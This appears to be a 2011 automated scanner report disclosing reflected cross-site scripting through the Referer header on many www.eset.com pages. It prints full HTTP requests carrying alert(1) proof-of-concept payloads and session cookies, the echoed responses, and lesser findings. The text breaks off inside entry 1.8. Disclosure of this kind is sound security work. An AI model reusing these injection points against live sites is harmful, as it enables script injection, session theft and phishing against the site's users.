XSS, DORK, www.eset.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Apr 17 09:47:55 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://www.eset.com/online-scanner [Referer HTTP header]

1.2. http://www.eset.com/online-scanner/help [Referer HTTP header]

1.3. http://www.eset.com/online-scanner/run [Referer HTTP header]

1.4. http://www.eset.com/purchase [Referer HTTP header]

1.5. http://www.eset.com/us [Referer HTTP header]

1.6. http://www.eset.com/us/ [Referer HTTP header]

1.7. http://www.eset.com/us/activate [Referer HTTP header]

1.8. http://www.eset.com/us/business/products [Referer HTTP header]

1.9. http://www.eset.com/us/company [Referer HTTP header]

1.10. http://www.eset.com/us/company/contact [Referer HTTP header]

1.11. http://www.eset.com/us/company/fun-stuff [Referer HTTP header]

1.12. http://www.eset.com/us/company/legal-notices [Referer HTTP header]

1.13. http://www.eset.com/us/company/privacy-policy [Referer HTTP header]

1.14. http://www.eset.com/us/download [Referer HTTP header]

1.15. http://www.eset.com/us/download/free-trial [Referer HTTP header]

1.16. http://www.eset.com/us/download/free-trial/nod32-antivirus [Referer HTTP header]

1.17. http://www.eset.com/us/download/free-trial/smart-security [Referer HTTP header]

1.18. http://www.eset.com/us/home [Referer HTTP header]

1.19. http://www.eset.com/us/home/compare-eset-to-competition [Referer HTTP header]

1.20. http://www.eset.com/us/home/nod32-antivirus [Referer HTTP header]

1.21. http://www.eset.com/us/home/smart-security [Referer HTTP header]

1.22. http://www.eset.com/us/online-scanner [Referer HTTP header]

1.23. http://www.eset.com/us/online-scanner/run [Referer HTTP header]

1.24. http://www.eset.com/us/partners [Referer HTTP header]

1.25. http://www.eset.com/us/partners/worldwide-partners [Referer HTTP header]

1.26. http://www.eset.com/us/press-center [Referer HTTP header]

1.27. http://www.eset.com/us/renew [Referer HTTP header]

1.28. http://www.eset.com/us/rss [Referer HTTP header]

1.29. http://www.eset.com/us/sitemap [Referer HTTP header]

1.30. http://www.eset.com/us/store [Referer HTTP header]

2. Cookie without HttpOnly flag set

3. Password field with autocomplete enabled

4. Referer-dependent response

5. Cross-domain POST

5.1. http://www.eset.com/us/home/nod32-antivirus

5.2. http://www.eset.com/us/home/smart-security

5.3. http://www.eset.com/us/store

5.4. http://www.eset.com/us/store

5.5. http://www.eset.com/us/store

5.6. http://www.eset.com/us/store

5.7. http://www.eset.com/us/store

5.8. http://www.eset.com/us/store

6. Cross-domain script include

6.1. http://www.eset.com/us/

6.2. http://www.eset.com/us/activate

6.3. http://www.eset.com/us/business/products

6.4. http://www.eset.com/us/company

6.5. http://www.eset.com/us/company/contact

6.6. http://www.eset.com/us/company/fun-stuff

6.7. http://www.eset.com/us/company/legal-notices

6.8. http://www.eset.com/us/company/privacy-policy

6.9. http://www.eset.com/us/download

6.10. http://www.eset.com/us/download/free-trial

6.11. http://www.eset.com/us/download/free-trial/nod32-antivirus

6.12. http://www.eset.com/us/download/free-trial/smart-security

6.13. http://www.eset.com/us/home

6.14. http://www.eset.com/us/home/compare-eset-to-competition

6.15. http://www.eset.com/us/home/nod32-antivirus

6.16. http://www.eset.com/us/home/smart-security

6.17. http://www.eset.com/us/online-scanner

6.18. http://www.eset.com/us/partners

6.19. http://www.eset.com/us/partners/worldwide-partners

6.20. http://www.eset.com/us/press-center

6.21. http://www.eset.com/us/renew

6.22. http://www.eset.com/us/rss

6.23. http://www.eset.com/us/sitemap

6.24. http://www.eset.com/us/store

7. Email addresses disclosed

7.1. http://www.eset.com/us/company/contact

7.2. http://www.eset.com/us/company/privacy-policy

7.3. http://www.eset.com/us/renew

8. Content type incorrectly stated

8.1. http://www.eset.com/us/scripts/business.js

8.2. http://www.eset.com/us/scripts/elqNow/elqCfg.js

8.3. http://www.eset.com/us/scripts/elqNow/elqImg.js

8.4. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js

8.5. http://www.eset.com/us/scripts/lib/mbox.js

8.6. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js

8.7. http://www.eset.com/us/scripts/lib/s_code3.js

8.8. http://www.eset.com/us/scripts/online-scanner.js



1. Cross-site scripting (reflected)  next
There are 30 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.eset.com/online-scanner [Referer HTTP header]  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /online-scanner

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5b9c"-alert(1)-"b05d62e2351 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-scanner HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=d5b9c"-alert(1)-"b05d62e2351

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=l77gn0qk2vii6glnvvfjiehd24; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20733
Date: Sun, 17 Apr 2011 12:55:02 GMT
X-Varnish: 1857986357
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=d5b9c"-alert(1)-"b05d62e2351";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.2. http://www.eset.com/online-scanner/help [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /online-scanner/help

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79440"-alert(1)-"b598b50e2ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-scanner/help HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=79440"-alert(1)-"b598b50e2ed

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13150
Date: Sun, 17 Apr 2011 14:15:44 GMT
X-Varnish: 1858168923
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=79440"-alert(1)-"b598b50e2ed";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.3. http://www.eset.com/online-scanner/run [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /online-scanner/run

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 745d9"-alert(1)-"b96c10ee407 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-scanner/run HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=745d9"-alert(1)-"b96c10ee407
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 3923
Date: Sun, 17 Apr 2011 12:59:41 GMT
X-Varnish: 1857996770
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
pageName="Online Scanner - Other Browser";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=745d9"-alert(1)-"b96c10ee407";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.4. http://www.eset.com/purchase [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /purchase

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e22"-alert(1)-"2096f355350 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /purchase HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=98e22"-alert(1)-"2096f355350

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Sun, 17 Apr 2011 14:15:52 GMT
X-Varnish: 1858169586
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=98e22"-alert(1)-"2096f355350";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.5. http://www.eset.com/us [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a252f"-alert(1)-"980a35ca14f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=a252f"-alert(1)-"980a35ca14f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Thu, 16-Jun-2011 14:15:43 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Sun, 17 Apr 2011 14:15:43 GMT
X-Varnish: 1858168883
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=a252f"-alert(1)-"980a35ca14f";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.6. http://www.eset.com/us/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c103"-alert(1)-"ae091e76540 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=6c103"-alert(1)-"ae091e76540

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Thu, 16-Jun-2011 14:15:40 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Sun, 17 Apr 2011 14:15:40 GMT
X-Varnish: 1858168585
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=6c103"-alert(1)-"ae091e76540";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.7. http://www.eset.com/us/activate [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/activate

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72d6a"-alert(1)-"5798006d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/activate HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=72d6a"-alert(1)-"5798006d14

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11168
Date: Sun, 17 Apr 2011 14:15:40 GMT
X-Varnish: 1858168645
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=72d6a"-alert(1)-"5798006d14";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.8. http://www.eset.com/us/business/products [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171a7"-alert(1)-"728ddbe3c42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/business/products HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=171a7"-alert(1)-"728ddbe3c42

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21125
